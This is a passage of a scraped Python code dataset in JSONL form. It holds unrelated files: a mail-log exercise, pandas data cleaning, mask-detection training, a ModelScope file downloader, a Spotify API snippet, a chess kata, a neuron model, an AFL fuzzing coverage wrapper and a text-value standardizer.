http://www.py4e.com/code3/mbox-short.txt\n'''\n\nfname = input('Enter the file name :')\ntry :\n file = open(fname, 'r')\nexcept :\n print(\"File ca not be found : \", file)\n quit()\n\ntargetline = []\ncount = 0\n\nfor line in file :\n if not line.startswith('From ') :\n continue\n\n count += 1\n targetline = line.split()\n print(targetline[1])\n\nprint('There were ' + str(count) + ' lines in the file with From as the first word')\n","sub_path":"py4e/Assignment_8.5.py","file_name":"Assignment_8.5.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"87495300","text":"import argparse\nimport logging \nimport hashlib\nlogging.basicConfig(level=logging.INFO)\n\nfrom urllib.parse import urlparse\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\ndef main(filename):\n logger.info('Start Cleaning process')\n df = _read_data(filename)\n newspaper_uid = _extract_newspaper_uid(filename)\n df = _add_newspaper_uid_column(df,newspaper_uid)\n df = _extract_host(df)\n df=_fill_missing_titles(df)\n df = _generate_uids_for_rows(df)\n df = _remove_new_lines_from_body(df)\n df = _remove_duplicate_entries(df, 'title')\n df = _drop_rows_with_missing_values(df)\n _save_data(df,filename)\n return df\n\n\ndef _remove_duplicate_entries(df, column_name):\n logger.info('Removing duplicates entries')\n df.drop_duplicates(subset=[column_name], keep='first', inplace=True)\n return df\n\n\ndef _drop_rows_with_missing_values(df):\n logger.info('Dropping rows with missing values')\n return df.dropna()\n\ndef _save_data(df, filename):\n clean_filename = 'clean_{}'.format(filename)\n logger.info('Saving data at location: {}'.format(clean_filename))\n df.to_csv(clean_filename)\n\ndef _remove_new_lines_from_body(df):\n 
logger.info('Remove new lines from body')\n stripped_body = (df\n .apply(lambda row: row['body'], axis=1)\n .astype(str).apply(lambda body: list(body))\n .apply(lambda letters: list(map(lambda letter: letter.replace('\\n', ' '), letters)))\n .apply(lambda letters: ''.join(letters))\n )\n df['body'] = stripped_body\n return df\n\ndef _generate_uids_for_rows(df):\n logger.info('Generating uids for each row')\n uids = (df\n .apply(lambda row: hashlib.md5(bytes(row['url'].encode())), axis=1)\n .apply(lambda hash_object: hash_object.hexdigest()) \n )\n df['uid'] = uids\n return df.set_index('uid')\n\ndef _fill_missing_titles(df):\n logger.info('Filling missing titles')\n missing_titles_mask = df['title'].isna()\n\n missing_titles = (df[missing_titles_mask]['url']\n .str.extract(r'(?P[^/]+)$')\n .astype(str).applymap(lambda title: title.split('-'))\n .applymap(lambda title_word_list: ''.join(title_word_list))\n )\n\n df.loc[missing_titles_mask, 'title'] = missing_titles.loc[:,'missing_titles']\n\n return df\n\n\ndef _extract_host(df):\n logger.info('Extracting host from urls')\n df['host'] = df['url'].apply(lambda url: urlparse(url).netloc)\n return df\n\n\ndef _add_newspaper_uid_column(df,newspaper_uid):\n logger.info('Filling newspaper_uid column with {}'.format(newspaper_uid))\n df['newspaper_uid'] = newspaper_uid\n return df\n\n\ndef _extract_newspaper_uid(filename):\n logger.info('Extracting newspaper uid')\n newspaper_uid = filename.split('_')[0]\n logger.info('Newspaper uid has detected: {}'.format(newspaper_uid))\n return newspaper_uid\n\ndef _read_data(filename):\n logger.info('Reading file {}'.format(filename))\n return pd.read_csv(filename)\n\nif __name__=='__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('filename',\n help='The path to the dirty data',\n type=str)\n\n arg = parser.parse_args()\n df = main(arg.filename)\n print(df)\n \n\n","sub_path":"Curso_Data_platzi/Ingenieriadedatos/web_scrapper_curso_data_eng/newspaper_receipe.py","file_name":"newspaper_receipe.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"29255759","text":"import packet\nfrom abc import ABC, abstractmethod\n\n\nclass Sequence(packet.Packet, ABC):\n def __init__(self, channel_nr: int, unit: str, resolution: float, buffer, device, description, date):\n self.channel_nr = channel_nr\n self.unit = unit\n self.resolution = resolution\n self.buffer = buffer\n super().__init__(device, description, date)\n\n @abstractmethod\n def __str__(self):\n return \"{} {} {} {}\".format(self.channel_nr, self.unit, self.resolution, self.buffer)\n","sub_path":"sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"387293312","text":"# -*- coding: utf-8 -*-\n\n\nimport os\n\nimport numpy as np\nimport tensorflow as tf\nfrom imutils import paths\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split\n\n\ndef get_model():\n baseModel = tf.keras.applications.MobileNetV2(weights=\"imagenet\", include_top=False,\n input_tensor=tf.keras.layers.Input(shape=(224, 224, 3)))\n base_model = baseModel.output\n base_model = tf.keras.layers.AveragePooling2D(pool_size=(7, 7))(base_model)\n base_model = tf.keras.layers.Flatten(name=\"flatten\")(base_model)\n base_model = tf.keras.layers.Dense(128, activation=\"relu\")(base_model)\n base_model = 
tf.keras.layers.Dropout(0.5)(base_model)\n base_model = tf.keras.layers.Dense(2, activation=\"softmax\")(base_model)\n model = tf.keras.models.Model(inputs=baseModel.input, outputs=base_model)\n for layer in baseModel.layers:\n layer.trainable = False\n es = tf.keras.callbacks.EarlyStopping(patience=2)\n\n opt = tf.keras.optimizers.Adam(lr=1e-4, decay=1e-4 / 20)\n model.compile(loss=\"binary_crossentropy\", optimizer=opt,\n metrics=[\"accuracy\"])\n\n return model\n\n\ndef train():\n print(\"[INFO] loading images...\")\n imagePaths = list(paths.list_images(\"train\"))\n if len(imagePaths) == 0:\n raise Exception(\n \"Train images not found!. Please verify the download path\")\n data = []\n labels = []\n # loop over the image paths\n for imagePath in imagePaths:\n # extract the class label from the filename\n label = imagePath.split(os.path.sep)[-2]\n # load the input image (224x224) and preprocess it\n image = tf.keras.preprocessing.image.load_img(\n imagePath, target_size=(224, 224))\n image = tf.keras.preprocessing.image.img_to_array(image)\n image = tf.keras.applications.mobilenet_v2.preprocess_input(image)\n # update the data and labels lists, respectively\n data.append(image)\n\n labelC = 0 if label == \"without_mask\" else 1\n labels.append(labelC)\n # convert the data and labels to NumPy arrays\n data = np.array(data, dtype=\"float32\")\n labels = np.array(labels)\n\n np.unique(labels)\n\n labels = tf.keras.utils.to_categorical(labels)\n\n (trainX, testX, trainY, testY) = train_test_split(data, labels,\n test_size=0.20, stratify=labels, random_state=42)\n es = tf.keras.callbacks.EarlyStopping(patience=2)\n\n model.fit(trainX, trainY, steps_per_epoch=32, validation_data=(\n testX, testY), validation_steps=len(testX)/32, epochs=20, callbacks=[es])\n\n model.save(\"masknet/mask_weights/mask_model.h5\")\n\n model.save_weights(\"masknet/mask_weights/mask_weights.h5\")\n\n\ndef evaluate():\n imagePaths = list(paths.list_images(\"test\"))\n dataTest = []\n labelsTest = []\n\n for imagePath in imagePaths:\n # extract the class label from the filename\n label = imagePath.split(os.path.sep)[-2]\n\n image = tf.keras.preprocessing.image.load_img(\n imagePath, target_size=(224, 224))\n image = tf.keras.preprocessing.image.img_to_array(image)\n image = tf.keras.applications.mobilenet_v2.preprocess_input(image)\n # update the data and labels lists, respectively\n dataTest.append(image)\n labelC = 0 if label == \"without_mask\" else 1\n labelsTest.append(labelC)\n\n dataTest = np.array(dataTest, dtype=\"float32\")\n labelsTest = np.array(labelsTest)\n\n labelsTest_B = tf.keras.utils.to_categorical(labelsTest)\n\n predIdxs = model.predict(dataTest, batch_size=32)\n\n predIdxs = np.argmax(predIdxs, axis=1)\n\n print(classification_report(labelsTest_B.argmax(axis=1), predIdxs,\n target_names=['With', 'Without']))\n\n\nmodel = get_model()\n\ntrain()\n\nevaluate()\n","sub_path":"train/detect_mask.py","file_name":"detect_mask.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"649193722","text":"# Copyright (c) Alibaba, Inc. 
and its affiliates.\n\nimport copy\nimport os\nimport tempfile\nfrom functools import partial\nfrom http.cookiejar import CookieJar\nfrom pathlib import Path\nfrom typing import Dict, Optional, Union\n\nimport requests\nfrom tqdm import tqdm\n\nfrom modelscope import __version__\nfrom modelscope.hub.api import HubApi, ModelScopeConfig\nfrom modelscope.utils.constant import DEFAULT_MODEL_REVISION\nfrom modelscope.utils.logger import get_logger\nfrom .constants import FILE_HASH\nfrom .errors import FileDownloadError, NotExistError\nfrom .utils.caching import ModelFileSystemCache\nfrom .utils.utils import (file_integrity_validation, get_cache_dir,\n                          get_endpoint, model_id_to_group_owner_name)\n\nlogger = get_logger()\n\n\ndef model_file_download(\n    model_id: str,\n    file_path: str,\n    revision: Optional[str] = DEFAULT_MODEL_REVISION,\n    cache_dir: Optional[str] = None,\n    user_agent: Union[Dict, str, None] = None,\n    local_files_only: Optional[bool] = False,\n    cookies: Optional[CookieJar] = None,\n) -> Optional[str]: # pragma: no cover\n    \"\"\"\n    Download from a given URL and cache it if it's not already present in the\n    local cache.\n\n    Given a URL, this function looks for the corresponding file in the local\n    cache. If it's not there, download it. Then return the path to the cached\n    file.\n\n    Args:\n        model_id (`str`):\n            The model to whom the file to be downloaded belongs.\n        file_path(`str`):\n            Path of the file to be downloaded, relative to the root of model repo\n        revision(`str`, *optional*):\n            revision of the model file to be downloaded.\n            Can be any of a branch, tag or commit hash\n        cache_dir (`str`, `Path`, *optional*):\n            Path to the folder where cached files are stored.\n        user_agent (`dict`, `str`, *optional*):\n            The user-agent info in the form of a dictionary or a string.\n        local_files_only (`bool`, *optional*, defaults to `False`):\n            If `True`, avoid downloading the file and return the path to the\n            local cached file if it exists.\n            if `False`, download the file anyway even it exists\n\n    Returns:\n        Local path (string) of file or if networking is off, last version of\n        file cached on disk.\n\n    <Tip>\n\n    Raises the following errors:\n\n    - [`EnvironmentError`](https://docs.python.org/3/library/exceptions.html#EnvironmentError)\n      if `use_auth_token=True` and the token cannot be found.\n    - [`OSError`](https://docs.python.org/3/library/exceptions.html#OSError)\n      if ETag cannot be determined.\n    - [`ValueError`](https://docs.python.org/3/library/exceptions.html#ValueError)\n      if some parameter value is invalid\n\n    </Tip>\n    \"\"\"\n    if cache_dir is None:\n        cache_dir = get_cache_dir()\n    if isinstance(cache_dir, Path):\n        cache_dir = str(cache_dir)\n    temporary_cache_dir = os.path.join(cache_dir, 'temp')\n    os.makedirs(temporary_cache_dir, exist_ok=True)\n\n    group_or_owner, name = model_id_to_group_owner_name(model_id)\n\n    cache = ModelFileSystemCache(cache_dir, group_or_owner, name)\n\n    # if local_files_only is `True` and the file already exists in cached_path\n    # return the cached path\n    if local_files_only:\n        cached_file_path = cache.get_file_by_path(file_path)\n        if cached_file_path is not None:\n            logger.warning(\n                \"File exists in local cache, but we're not sure it's up to date\"\n            )\n            return cached_file_path\n        else:\n            raise ValueError(\n                'Cannot find the requested files in the cached path and outgoing'\n                ' traffic has been disabled. To enable model look-ups and downloads'\n                \" online, set 'local_files_only' to False.\")\n\n    _api = HubApi()\n    headers = {\n        'user-agent': ModelScopeConfig.get_user_agent(user_agent=user_agent, )\n    }\n    if cookies is None:\n        cookies = ModelScopeConfig.get_cookies()\n\n    revision = _api.get_valid_revision(\n        model_id, revision=revision, cookies=cookies)\n    file_to_download_info = None\n    # we need to confirm the version is up-to-date\n    # we need to get the file list to check if the latest version is cached, if so return, otherwise download\n    model_files = _api.get_model_files(\n        model_id=model_id,\n        revision=revision,\n        recursive=True,\n        use_cookies=False if cookies is None else cookies)\n\n    for model_file in model_files:\n        if model_file['Type'] == 'tree':\n            continue\n\n        if model_file['Path'] == file_path:\n            if cache.exists(model_file):\n                logger.info(\n                    f'File {model_file[\"Name\"]} already in cache, skip downloading!'\n                )\n                return cache.get_file_by_info(model_file)\n            else:\n                file_to_download_info = model_file\n            break\n\n    if file_to_download_info is None:\n        raise NotExistError('The file path: %s not exist in: %s' %\n                            (file_path, model_id))\n\n    # we need to download again\n    url_to_download = get_file_download_url(model_id, file_path, revision)\n    file_to_download_info = {\n        'Path': file_path,\n        'Revision': file_to_download_info['Revision'],\n        FILE_HASH: file_to_download_info[FILE_HASH]\n    }\n\n    temp_file_name = next(tempfile._get_candidate_names())\n    http_get_file(\n        url_to_download,\n        temporary_cache_dir,\n        temp_file_name,\n        headers=headers,\n        cookies=None if cookies is None else cookies.get_dict())\n    temp_file_path = os.path.join(temporary_cache_dir, temp_file_name)\n    # for download with commit we can't get Sha256\n    if file_to_download_info[FILE_HASH] is not None:\n        file_integrity_validation(temp_file_path,\n                                  file_to_download_info[FILE_HASH])\n    return cache.put_file(file_to_download_info,\n                          os.path.join(temporary_cache_dir, temp_file_name))\n\n\ndef get_file_download_url(model_id: str, file_path: str, revision: str):\n    \"\"\"\n    Format file download url according to `model_id`, `revision` and `file_path`.\n    e.g., Given `model_id=john/bert`, `revision=master`, `file_path=README.md`,\n    the resulted download url is: https://modelscope.co/api/v1/models/john/bert/repo?Revision=master&FilePath=README.md\n    \"\"\"\n    download_url_template = '{endpoint}/api/v1/models/{model_id}/repo?Revision={revision}&FilePath={file_path}'\n    return download_url_template.format(\n        endpoint=get_endpoint(),\n        model_id=model_id,\n        revision=revision,\n        file_path=file_path,\n    )\n\n\ndef http_get_file(\n    url: str,\n    local_dir: str,\n    file_name: str,\n    cookies: CookieJar,\n    headers: Optional[Dict[str, str]] = None,\n):\n    \"\"\"\n    Download remote file. 
Do not gobble up errors.\n This method is only used by snapshot_download, since the behavior is quite different with single file download\n TODO: consolidate with http_get_file() to avoild duplicate code\n\n Args:\n url(`str`):\n actual download url of the file\n local_dir(`str`):\n local directory where the downloaded file stores\n file_name(`str`):\n name of the file stored in `local_dir`\n cookies(`CookieJar`):\n cookies used to authentication the user, which is used for downloading private repos\n headers(`Optional[Dict[str, str]] = None`):\n http headers to carry necessary info when requesting the remote file\n\n \"\"\"\n total = -1\n temp_file_manager = partial(\n tempfile.NamedTemporaryFile, mode='wb', dir=local_dir, delete=False)\n\n with temp_file_manager() as temp_file:\n logger.info('downloading %s to %s', url, temp_file.name)\n headers = copy.deepcopy(headers)\n\n r = requests.get(url, stream=True, headers=headers, cookies=cookies)\n r.raise_for_status()\n\n content_length = r.headers.get('Content-Length')\n total = int(content_length) if content_length is not None else None\n\n progress = tqdm(\n unit='B',\n unit_scale=True,\n unit_divisor=1024,\n total=total,\n initial=0,\n desc='Downloading',\n )\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n progress.update(len(chunk))\n temp_file.write(chunk)\n progress.close()\n\n logger.info('storing %s in cache at %s', url, local_dir)\n downloaded_length = os.path.getsize(temp_file.name)\n if total != downloaded_length:\n os.remove(temp_file.name)\n msg = 'File %s download incomplete, content_length: %s but the \\\n file downloaded length: %s, please download again' % (\n file_name, total, downloaded_length)\n logger.error(msg)\n raise FileDownloadError(msg)\n os.replace(temp_file.name, os.path.join(local_dir, file_name))\n","sub_path":"ai/modelscope/modelscope/hub/file_download.py","file_name":"file_download.py","file_ext":"py","file_size_in_byte":9063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"589867394","text":"import os\nimport spotipy\nimport requests\nfrom dotenv import load_dotenv\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom spotipy.oauth2 import SpotifyOAuth\n\nscope = \"user-library-read\"\nuser_id = 1139419156\nplaylist_id = \"37i9dQZF1E8BKPvDxDZEtP\"\n\nload_dotenv() # take environment variables from .env.\n\nauth_manager = SpotifyClientCredentials()\n# sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))\nsp = spotipy.Spotify(auth_manager=auth_manager)\n\nurl = f\"https://api.spotify.com/v1/users/{user_id}/playlists\"\nplaylistID = f\"https://api.spotify.com/v1/playlists/{playlist_id}/tracks\"\ntrackName = f\"\"\nprint(url)\n# url = \"\thttps://api.spotify.com/v1/me\"\n\npayload={}\nheaders = {\n 'Authorization': 'Bearer <>'\n}\n\nresponse = requests.request(\"GET\", playlistID, headers=headers, data=payload)\n\nprint(response.text)","sub_path":"spotty.py","file_name":"spotty.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"447598456","text":"\"\"\"\r\n\n\nIn chess, queens can move any number of squares horizontally, vertically or\ndiagonally.\n\nGiven the location of your queen and your opponents' queen, determine whether\nor not you're able to capture your opponent's queen. 
Your location and your\nopponents' location are the first and second elements of the list,\nrespectively.\n\n### Examples\n\n can_capture([\"A1\", \"H8\"]) ➞ True\n # Your queen can move diagonally to capture opponents' piece.\n \n can_capture([\"A1\", \"C2\"]) ➞ False\n # Your queen cannot reach C2 from A1 (although a knight could).\n \n can_capture([\"G3\", \"E5\"]) ➞ True\n\n### Notes\n\nAssume there are no blocking pieces.\n\n\"\"\"\r\n\ndef can_capture(queens):\n if queens[0][0] == queens[1][0] or queens[0][1] == queens[1][1]:\n return True\n else:\n ax = ord(queens[0][0])\n ay = ord(queens[0][1])\n ox = ord(queens[1][0])\n oy = ord(queens[1][1])\n if abs(ax-ox) == abs(ay-oy):\n return True\n else:\n return False\n\n","sub_path":"qjB3KLrK6JkmBkMZR_17.py","file_name":"qjB3KLrK6JkmBkMZR_17.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"257321948","text":"import numpy as np\nimport matplotlib.pyplot as plt\n''' ----------------------------------------------------------------- ***\n Integrate and fire |\n - Ohmic leakage current + voltage gated currents deactivated |\n at rest |\n CV' = I - gleak(V - Eleak) |\n if V == Ethresh: activation of volrage-sensitive |\n currents -> action potential, V <- Ek |\n References: |\n Izhikevich, E.M. (2007) |\n*** ----------------------------------------------------------------- '''\nclass passive_IF:\n C = 1.0 # capacitance\n V0 = -70 # reset V\n El = -60 # leak equilibrium potential\n Eth = -55 # spike treshold\n g = 0.001 # conductance\n \n V = 0.0 # membrane potential\n\n def simulate(self, I):\n Vs = np.zeros(len(I))\n spikes = []\n for n in range(len(I)):\n dV = (I[n] - self.g*(self.V - self.El)) / self.C\n V = self.V + dV\n if V >= self.Eth:\n V = self.V0\n spikes.append(n)\n self.V = V\n Vs[n] = V\n return Vs, spikes\n\n def __init__(self, V0=-70, El=-60, Eth=-55, g=0.001):\n self.V0 = V0\n self.El = El\n self.Eth = Eth\n self.g = g\n\n\n","sub_path":"IF.py","file_name":"IF.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"20009425","text":"import collections\n\n\ndef tail(secuencia, cantidad):\n #secuencia = list(secuencia)\n if cantidad > 0:\n d1 = collections.deque(maxlen=cantidad)\n for element in secuencia:\n d1.append(element)\n print(f\"element={element}\")\n '''\n print(f\"secuencia={secuencia}\")\n reversed_iterable = secuencia[::-1]\n print(f\"reversed= {reversed_iterable}\")\n reversed_sol = reversed_iterable[:cantidad]\n print(f\"reversed_sol= {reversed_sol}\")\n sol= reversed_sol[::-1]\n print(f\"sol= {sol}\")\n '''\n print(f\"d1={d1}\")\n return list(d1)\n\n else:\n return []","sub_path":"tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"181232540","text":"import argparse\nimport shlex\nimport subprocess\nimport sys\nimport threading\nimport time\n\nimport os\nfrom shutil import copyfile\n\n\ndef signal_term_handler(signal, frame):\n global aflfuzzerprocess\n global syncqueue\n if syncqueue:\n syncqueue.alive = False\n syncqueue._stop()\n print('got SIGTERM')\n print(aflfuzzerprocess)\n if aflfuzzerprocess:\n print(\"Killing fuzzer process\")\n aflfuzzerprocess.kill()\n sys.exit(0)\n\n\ndef get_afl_metadata(afl_dir_path) -> {}:\n fuzzer_stats_dict = {}\n try:\n # print(afl_dir_path+\"/fuzzer_stats\")\n with 
open(afl_dir_path + \"/fuzzer_stats\") as package_info_filepointer:\n text = package_info_filepointer.read()\n tmp_list = [item.strip().split(\":\", 1) for item in text.split(\"\\n\")]\n for item in tmp_list:\n # print(tmp_list)\n if len(item) == 2:\n fuzzer_stats_dict[item[0].strip()] = item[1].strip()\n # print(fuzzer_stats_dict)\n return fuzzer_stats_dict\n except FileNotFoundError:\n return None\n\n\nclass SyncQueue(threading.Thread):\n def __init__(self, fuzzer_dir: str, target_dir: str):\n threading.Thread.__init__(self)\n self.fuzzer_dir = fuzzer_dir\n self.queue_dir = os.path.join(self.fuzzer_dir, \"queue\")\n self.target_dir = target_dir\n if not os.path.exists(self.target_dir):\n os.makedirs(self.target_dir, exist_ok=True)\n self.alive = True\n\n def run(self):\n while self.alive:\n time.sleep(5) # sleep five seconds\n copy_to_dir = os.path.join(self.target_dir, \"queue\" + str(int(time.time())))\n os.mkdir(copy_to_dir)\n src_files = os.listdir(self.queue_dir)\n for file in src_files:\n if os.path.isfile(os.path.join(self.queue_dir, file)):\n copyfile(os.path.join(self.queue_dir, file), copy_to_dir + \"/\" + file)\n\n def _stop(self):\n self.alive = False\n\n\ndef main(invocation: str, queue_dir: str):\n global aflfuzzerprocess\n global SyncQueue\n output_argument_idx = shlex.split(invocation).index(\"-o\")\n afl_out_dir = shlex.split(invocation)[output_argument_idx + 1]\n print(\"out dir\", afl_out_dir)\n print(\"queue dir\", queue_dir)\n print(\"afl-fuzz \" + invocation)\n syncqueue = SyncQueue(afl_out_dir, queue_dir)\n syncqueue.start()\n import sh\n aflfuzz = sh.Command(\"afl-fuzz\")\n try:\n aflfuzzerprocess = subprocess.Popen(shlex.split(\"timeout 5m afl-fuzz \" + invocation), shell=False)\n aflfuzzerprocess.wait()\n except Exception as e:\n syncqueue.alive = False\n print(e)\n syncqueue.alive = False\n syncqueue._stop()\n\n\nif __name__ == \"__main__\":\n global aflfuzzerprocess\n global aflfuzzerprocess\n aflfuzzerprocess = None\n syncqueue = None\n parser = argparse.ArgumentParser(description='Evaluation helper script.')\n parser.add_argument(\"-i\", \"--invocation\", required=True, type=str, help=\"The invocation for the fuzzer.\",\n default=None)\n parser.add_argument(\"-q\", \"--qdir\", required=True, type=str, help=\"Where should the queue be stored?.\",\n default=None)\n args = parser.parse_args()\n try:\n main(args.invocation, args.qdir)\n except KeyboardInterrupt:\n print(\"Keyboard\")\n signal_term_handler(1, 1)\n","sub_path":"fexm/evalscripts/measure_coverage.py","file_name":"measure_coverage.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"113332663","text":"# -*- coding:utf8 -*-\n\nu\"\"\"末端值标准化与解析\"\"\"\n\nimport re\nfrom xml.etree import ElementTree as ET\nfrom xml.etree.ElementTree import ParseError\n\nfrom logbook import Logger\n\nfrom .topo import TermVal\nfrom .typeclass import StandardizedData\nfrom ..keypath import kp_push\n\n\nlogger = Logger(__name__)\n\n\n__all__ = ['StdTermVal', 'standardize_term_val']\n\n\ndef is_empty(v):\n return v == [] or v == {} or v == '' or v is None\n\n\nclass StdTermVal(TermVal):\n def __init__(self, value, namespace=None, key=None, original=None):\n super(StdTermVal, self).__init__(value)\n self.namespace = namespace\n self.key = key\n self.original = original or value\n\n @classmethod\n def standardize(cls, term):\n assert isinstance(term, TermVal)\n\n if isinstance(term, StdTermVal):\n return term\n\n v = term.value\n if 
isinstance(v, list):\n            lst = v\n            attrs_lst = [std_single_element(e) for e in lst]\n            attrs = {\n                'value': [att['value'] for att in attrs_lst if not is_empty(att['value'])],\n                'namespace': {att['namespace'] for att in attrs_lst if att['namespace'] is not None},\n                'key': {att['key'] for att in attrs_lst if att['key'] is not None}\n            }\n\n            attrs['value'] = sorted(attrs['value'])  # 去顺序化\n        else:\n            attrs = std_single_element(v)\n\n        attrs['original'] = v\n        return cls(**attrs)\n\n    def is_empty(self):\n        return is_empty(self.value)\n\n    def __repr__(self):\n        t = u'%s' % repr(self.value)\n        if self.namespace:\n            t += u', namespace=%s' % repr(self.namespace)\n        if self.key:\n            t += u', key=%s' % repr(self.key)\n        return (u'StdTermVal(%s)' % t).encode('utf-8')\n\n    def __eq__(self, other):\n        if isinstance(other, StdTermVal):\n            va, vb = self.value, other.value\n\n            if isinstance(va, list) and isinstance(vb, list):\n                if len(va) == len(vb):\n                    return all([self._element_eq(ea, eb) for ea, eb in zip(va, vb)])\n                else:\n                    return False\n\n            else:\n                return self._element_eq(va, vb)\n\n        return False\n\n    @staticmethod\n    def _element_eq(a, b):\n        try:\n            return a == b or float(a) == float(b)\n        except (TypeError, ValueError):\n            return False\n\n\ndef std_single_element(e):\n    try:\n        attrs = std_value_with_attrs(e)\n    except (ParseError, TypeError):\n        attrs = std_value_without_attrs(e)\n\n    if isinstance(attrs['value'], (str, unicode)):\n        is_fuzzy, fuzzy_info = parse_as_placeholder(attrs['value'])\n        if is_fuzzy:\n            attrs['value'] = fuzzy_info['naked']\n\n    return attrs\n\n\ndef std_value_with_attrs(txt):\n    u\"\"\"解析带有扩展信息的单值\"\"\"\n\n    if isinstance(txt, unicode):\n        txt = txt.encode('utf-8')\n\n    node = ET.fromstring(txt)\n\n    value = None\n    namespace = None\n    key = None\n\n    sub_nodes = node.getchildren()\n    for n in sub_nodes:\n        if n.tag == 'value':\n            value = n.text or ''\n\n            if isinstance(value, str):\n                value = value.decode('utf-8')\n\n        elif n.tag == 'namespace':\n            namespace = n.text\n        elif n.tag == 'key':\n            key = n.text\n\n    assert value is not None, 'value tag must exist and not empty'\n\n    if isinstance(value, (str, unicode)):\n        value = std_string(value)\n\n    return {\n        'value': value,\n        'namespace': namespace,\n        'key': key\n    }\n\n\ndef std_value_without_attrs(o):\n    u\"\"\"解释不带扩展信息的单值\"\"\"\n\n    if isinstance(o, bool) or o is None:\n        value = o\n\n    else:\n        if isinstance(o, (str, unicode)):\n            value = o\n        else:\n            value = unicode(o)\n\n        value = std_string(value)\n\n    return {\n        'value': value,\n        'namespace': None,\n        'key': None\n    }\n\n\ndef std_string(txt):\n\n    # 统一使用 unicode,只有 bool 不动\n    if isinstance(txt, unicode):\n        uni = txt\n    elif isinstance(txt, str):\n        uni = txt.decode('utf-8')\n    else:\n        uni = unicode(txt)\n\n    # 去掉空白\n    o = re.sub(u'\\s+', u' ', uni.strip(u' \\t\\n'))\n\n    # 全角转半角\n    o = _str_q2b(o)\n\n    # 标准化罗马数字\n    o = _replace_luoma_char(o)\n\n    return o\n\n\ndef parse_as_placeholder(txt):\n    u\"\"\"按照占位符格式来解析文本\n\n    占位符格式为 \"__CIE_PLACEHOLDER__()/\"\n    \"\"\"\n    is_fuzzy = False\n    placeholder = {\n        'issue': None,\n        'number': 0,\n        'naked': '',\n    }\n\n    if txt.startswith('__CIE_PLACEHOLDER__'):\n        pre, issue = txt.split('/', 1)\n\n        pre = pre[len('__CIE_PLACEHOLDER__('):]\n        pre = pre[:-1]\n        number = int(pre)\n\n        placeholder = {\n            'issue': issue.strip(),\n            'number': number,\n            'naked': ''\n        }\n\n        is_fuzzy = True\n\n    else:\n        placeholder['naked'] = txt\n\n    return is_fuzzy, placeholder\n\n\ndef _str_q2b(ustring):\n    u\"\"\"全角转半角: “。” 不转, 特殊罗马字符等也不转\"\"\"\n    rstring = u''\n    for uchar in ustring:\n        inside_code = ord(uchar)\n        # 全角空格直接转换\n        if inside_code == 12288:\n            inside_code = 32\n        # 全角字符(除空格)根据关系转化\n        elif 65281 <= inside_code <= 65374:\n            inside_code -= 65248\n\n        rstring += unichr(inside_code)\n    return rstring\n\n\ndef _replace_luoma_char(old_str):\n    if len(old_str.rstrip()) == 0:\n        return u\"\"\n    old_str = old_str.replace(u\"Ⅰ\", u\"I\").replace(u\"Ⅱ\", u\"II\").replace(u\"Ⅲ\", u\"III\")\n    old_str = old_str.replace(u\"Ⅳ\", u\"IV\").replace(u\"Ⅴ\", u\"V\").replace(u\"Ⅵ\", u\"VI\")\n    old_str = old_str.replace(u\"Ⅶ\", u\"VII\").replace(u\"Ⅷ\", u\"VIII\").replace(u\"Ⅸ\", u\"IX\")\n    old_str = old_str.replace(u\"Ⅹ\", u\"X\").replace(u\"Ⅺ\", u\"XI\").replace(u\"Ⅻ\", u\"XII\")\n\n    return old_str\n\n\ndef standardize_term_val(std):\n    u\"\"\"给标准嵌套结构数据,把所有的末端值标准化,再删掉无意义的空末端值\"\"\"\n    assert isinstance(std, StandardizedData)\n    return StandardizedData(_standardize_term_val(std.data, ''))\n\n\ndef _standardize_term_val(o, keypath):\n    if isinstance(o, TermVal):\n        try:\n            term = StdTermVal.standardize(o)\n        except Exception:\n            logger.error('ValueStandardizeError: @{} value standardization failed {}', keypath, o)\n            return None\n        else:\n            if not term.is_empty():\n                return term\n\n    elif isinstance(o, list):\n        lst = []\n        for e in o:\n            v = _standardize_term_val(e, keypath)\n            if not is_empty(v):\n                lst.append(v)\n        return lst\n\n    elif isinstance(o, dict):\n        dct = {}\n        for k, v in o.iteritems():\n            v = _standardize_term_val(v, kp_push(keypath, k))\n            if not is_empty(v):\n                dct[k] = v\n        return dct\n","sub_path":"cie_eval/standardize/value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
